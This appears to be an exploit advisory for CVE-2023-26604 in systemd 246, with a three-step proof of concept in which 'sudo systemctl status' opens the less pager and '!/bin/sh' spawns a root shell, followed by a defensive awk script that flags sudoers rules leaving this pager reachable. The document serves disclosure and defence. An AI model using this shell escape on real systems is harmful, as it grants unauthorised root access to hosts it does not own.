# Exploit Title: systemd 246 - Local Privilege Escalation
# Exploit Author: Iyaad Luqman K (init_6)
# Application: systemd 246
# Tested on: Ubuntu 22.04
# CVE: CVE-2023-26604

systemd 246 was discovered to contain a privilege escalation vulnerability that applies when the `systemctl status` command can be run as the root user. This vulnerability allows a local attacker to gain root privileges.

## Proof Of Concept:

1. Run the systemctl command which can be run as the root user.

   ```
   sudo /usr/bin/systemctl status any_service
   ```

2. The output is opened in a pager (less), which allows us to execute arbitrary commands.

3. Type `!/bin/sh` in the pager to spawn a shell as the root user.
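
For defenders, an added example (not part of the original advisory) that reviews sudoers text for rules granting `systemctl` while the pager described above stays reachable. The sample sudoers lines and user names are constructed, and the check is a text heuristic that assumes `--no-pager` in the command spec or the sudoers `NOEXEC` tag closes off the pager escape.

```shell
#!/bin/sh
# Added example: audit sudoers text for systemctl rules that leave the
# pager (and its "!" shell escape) reachable when run through sudo.

# audit_sudoers: reads sudoers text on stdin and prints one line per rule
# that grants systemctl without "--no-pager" and without the NOEXEC tag.
# Heuristic only: it matches text, it does not fully parse sudoers grammar.
audit_sudoers() {
    awk '
        # Join backslash-continued lines, remembering where the rule began.
        { start = NR
          while (sub(/\\$/, "") && (getline nxt) > 0) $0 = $0 nxt }
        # Skip blanks, comments (but not "#uid" user specs) and Defaults.
        /^[ \t]*$/ || /^[ \t]*#[^0-9]/ || /^[ \t]*Defaults/ { next }
        # --no-pager keeps less from starting; NOEXEC stops the command
        # from executing further programs, including the pager.
        /systemctl/ && !/--no-pager/ && !/NOEXEC:/ {
            printf "RISKY line %d: %s\n", start, $0
        }
    '
}

# Constructed sample input; none of these rules come from a real system.
sample_sudoers() {
    cat <<'EOF'
# constructed sample sudoers fragment
Defaults env_reset
alice ALL=(root) NOPASSWD: /usr/bin/systemctl status *
bob ALL=(root) /usr/bin/systemctl --no-pager status nginx
carol ALL=(root) NOEXEC: /usr/bin/systemctl status sshd
dave ALL=(root) NOPASSWD: /usr/bin/apt update, \
    /usr/bin/systemctl status cron
EOF
}

# Demo run on the sample; on a host, feed it the real files instead, e.g.
#   cat /etc/sudoers /etc/sudoers.d/* | audit_sudoers
sample_sudoers | audit_sudoers
```

Flagged rules can be rewritten to include `--no-pager`, tagged `NOEXEC:`, or removed if the access is not needed.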